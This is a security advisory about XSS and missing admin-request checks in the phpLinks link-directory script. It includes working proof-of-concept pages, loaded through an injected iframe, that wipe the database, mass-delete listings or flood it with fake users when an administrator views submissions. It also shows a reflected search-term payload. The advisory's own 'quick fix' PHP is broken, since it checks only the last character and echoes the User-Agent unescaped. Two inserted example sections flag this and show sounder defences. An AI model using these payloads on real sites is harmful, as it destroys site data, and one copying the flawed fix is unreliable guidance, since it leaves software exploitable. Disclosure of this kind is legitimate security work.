
Security flaw in Multiple PHPLink that allows access with admin privileges

phpLinks is free software that is very widely used for link farms and search engines. It has a security flaw that allows dangerous scripts to be injected into its scripts and run with the same privileges as a site admin!

The details follow:

phpLinks is an open source free PHP script. phpLinks allows you to run a very powerful link farm or search engine. phpLinks has multilevel site categorization, infinite threaded search capabilities and more. phpLinks is very simple to setup.

There lies a fault in the include/add.php script that allows a remote attacker to inject code into the script and have it run as an admin. The vulnerability comes from improper input validation and improper session authentication. Below is some example code that I have written.

Put this in one of the fields on the "Add Site" form located at

http://blah/phplinks/index.php?show=add&PID=

If you inject the code into the Site Title or Site Url field, the code will be run as soon as a logged in administrator views it.

<iframe src=http://blah/death.html></iframe>

Below is the code for the called file "death.html"

<script language=JavaScript>
var i = 10; // This is the number of the user ID to start deleting
var BaseURL = "http://victimsite/phplinks/";
window.open(BaseURL + '/admin/reset.php?reset_in=&reset_out=&search_terms=&referrers=&submit='); // this resets the database
function Waste()
{
    while (i) {
        i++;
        window.open(BaseURL + 'admin/delete_site.php?dbtable=links&ID=' + i + '&sure=Yes');
    }
}
</script>
<body onLoad="Waste();">

As you can see, when that code (called by a logged in admin validating sites) is run, the database is in a lot of cases going to be left empty. By the way, the dbtable=links can be changed to dbtable=temp in order to affect sites not yet approved etc. On the other hand you can add users to the database and more. Take the following code for example.

<iframe src=http://blah/life.html></iframe>

Below is the code for the called file "life.html"

<script language=JavaScript>
var i = 1;
var BaseURL = "http://victimsite/phplinks/";
function Gluttony()
{
    while (i) {
        i++;
        window.open(BaseURL + '/admin/add_site.php?SiteName=JeiAr0wnethTheee' + i
            + '&SiteURL=http://www.b' + i + 'j.orfd&Description=' + i
            + '3333333333333333333333333333333333&Category=&Country=Turkey.gif&Email=1@t.' + i
            + '&UserName=12345' + i
            + '&Password=12345678&Hint=12345678910&add=' + i + '&sure=Yes');
    }
}
</script>
<body onLoad="Gluttony();">

Once again, when a logged in admin goes to validate sites (unless they have a popup killer, JS disabled, etc.) they are gonna be adding MANY users to the database before they really realize what's happening. This also jolts the server quite a bit by hogging up resources. You can basically change almost anything that the admin can by just injecting code. Also, note that these proof of concept scripts could be altered to supply large numbers of malformed site submissions, and instead make it something worse like popunder windows etc. But I do not feel it would be very good to release a script like that publicly :) Also note that for whatever reason the most updated Norton AV does not pick this script up as a window bomb. Maybe it's cause my JavaScript is so bastardized it doesn't recognize the code at all heheh j/k.

I put together a quick fix. I am no php guru, so if there is a better way then please correct me :)

In the includes/add.php file find the following

// Handle form submission
if(isset($submit_add)){

And right below it paste the following code

// PHPLinks Critical XSS Vulnerability Fix - By JeiAr - jeiar@kmfms.com //
//////////////////////////////////////////////////////////////////////////
$ip = $REMOTE_ADDR;
$info = $HTTP_USER_AGENT;
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $SiteName)) {$err.= "Please enter A valid Site Name.";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $SiteURL)) {$err.= "Please enter A valid Site URL.";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Description)) {$err.= "Enter A valid Description.";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Category)) {$err.= "Enter A valid Category.";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Country)) {$err.= "Enter A valid Country.";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $UserName)) {$err.= "Enter A valid UserName.";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $PW)) {$err.= "Please enter A valid Password.";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $PW2)) {$err.= "Please enter A valid Password.";}
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $Hint)) {$err.= "Please enter A valid Hint.";}
if ($err) {
    echo $err;
    echo "<b>Possible Hack Attempt!!</b>";
    echo "<b>$ip</b>";
    echo "<b>$info</b>";
    echo "Back";
    exit;
}
/////////////////////////////////////////////////////////////////////////
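The advisory names improper session authentication as a second cause: the admin scripts in the proof of concept act on a plain GET request from whatever page the admin's browser loads. As an added example (not code from the advisory or from phpLinks), a guard that state-changing admin scripts could call first; the session keys `is_admin` and `csrf` and both function names are assumptions.

```php
<?php
// Added example; a hypothetical guard, not phpLinks code.

// Issue one random token per session and embed it in every admin form.
function csrfToken(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Gate for state-changing admin scripts (delete, add, reset).
// 'is_admin' and 'csrf' are assumed session keys for this example.
function adminActionAllowed(array $server, array $post, array $session): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;               // links, iframes and window.open() issue GET
    }
    if (empty($session['is_admin'])) {
        return false;               // no authenticated admin session
    }
    $sent     = $post['csrf'] ?? '';
    $expected = $session['csrf'] ?? '';
    return is_string($sent) && $expected !== ''
        && hash_equals($expected, $sent);   // constant-time comparison
}

// Constructed requests, passed as arrays so the example runs from the CLI.
$session = ['is_admin' => true];
$token   = csrfToken($session);

$cases = [
    'GET with sure=Yes in the query' => [['REQUEST_METHOD' => 'GET'], []],
    'POST without a token'           => [['REQUEST_METHOD' => 'POST'], []],
    'POST with the session token'    => [['REQUEST_METHOD' => 'POST'], ['csrf' => $token]],
];

foreach ($cases as $label => [$server, $post]) {
    $ok = adminActionAllowed($server, $post, $session);
    printf("%-32s %s\n", $label, $ok ? 'allowed' : 'refused');
}
```

A token only stops requests that originate on another site; markup injected into the admin page itself runs in the same origin and can read the token, so submitted fields still have to be encoded when they are displayed.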

There is also a much less serious, but similar issue with the search feature. You can basically execute just about any JavaScript or HTML code and maybe more? Here is an example

http://www.blah.org/index.php?term=<scr </script>

And if you write a script to send many automated malformed search strings, the code will show up with the most searched for terms on the main search page, thus running any code you supply on the site's visitors' browsers. Below is a quick fix for that, I basically just ereg the input for invalid metacharacters.

In includes/results.php find the following

if(isset($term) && strlen($term)>0){

Below it place the following

/////////////////////////////////////////////////////////////////////////
// PHPLinks XSS Vulnerability Fix - By JeiAr - jeiar@kmfms.com 01-2003 //
/////////////////////////////////////////////////////////////////////////
$ip = $REMOTE_ADDR;
$info = $HTTP_USER_AGENT;
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $term)) {$err.= "Please enter A valid Search Term.";}
if ($err) {
    echo $err;
    echo "<b>Possible Hack Attempt!!</b>";
    echo "<b>$ip</b>";
    echo "<b>$info</b>";
    echo "Back";
    exit;
}
////////////////////////////////////////////////////////////////////////
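Both quick fixes above (add.php and results.php) use the same pattern, which ends in `$` and so tests only the final character of each field; `ereg()` itself was removed in PHP 7. As an added example (not the advisory's or the project's code), the pattern ported to `preg_match()` next to encoding at output time; the helper names, the renderer and the sample submissions are constructed for illustration.

```php
<?php
// Added example; not code from the advisory or from phpLinks.

// The advisory's character class, ported from ereg() (removed in PHP 7)
// to preg_match(). The trailing "$" ties it to the last character only.
const ADVISORY_PATTERN = '/[-!#$%&\'"*+\\\\.<->=?^_`{|}]$/';

function advisoryFilterRejects(string $value): bool
{
    return preg_match(ADVISORY_PATTERN, $value) === 1;
}

// Encode at output time, for every stored or reflected value. This also
// applies to request headers echoed back, such as the User-Agent string.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Allow only absolute http(s) URLs into an href attribute.
function isHttpUrl(string $url): bool
{
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true);
}

// Hypothetical renderer for one row of the admin validation list.
function renderPendingSite(string $name, string $url): string
{
    $href = isHttpUrl($url) ? e($url) : '#';
    return '<li><a href="' . $href . '">' . e($name) . '</a></li>';
}

// Constructed submissions: [Site Title, Site Url].
$samples = [
    ['Rock & Roll!', 'http://example.org/'],            // legitimate title
    ['<b>markup</b> then text', 'http://example.org/'], // markup mid-string
    ['Plain title', 'not a url'],                       // malformed URL
];

foreach ($samples as [$name, $url]) {
    printf("filter rejects title: %s\n", advisoryFilterRejects($name) ? 'yes' : 'no');
    echo renderPendingSite($name, $url), "\n";
}
```

The first sample is a legitimate title that the end-anchored pattern refuses, and the second carries markup the pattern never inspects; encoding when the value is rendered handles both, and the same `e()` call applies to search terms shown in the most-searched list.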

One bad thing about the most searched for keywords feature is that anyone can put their web page, name, or something obscene as a search term. After clicking submit xxx number of times, they now have whatever they want on your main search page. Not really a security issue, but could be annoying. Don't ya think? And if someone used some CSS they could basically deface the site in a really lame kinda way.

Note that this has only been tested on the latest version of phplinks. Older versions may not be affected but I kinda doubt it.

JeiAr - CyberArmy Security Research ACAT Team

http://www.gulftech.org

http://www.security-research.org


Posted: 08/08/2014, 01:22
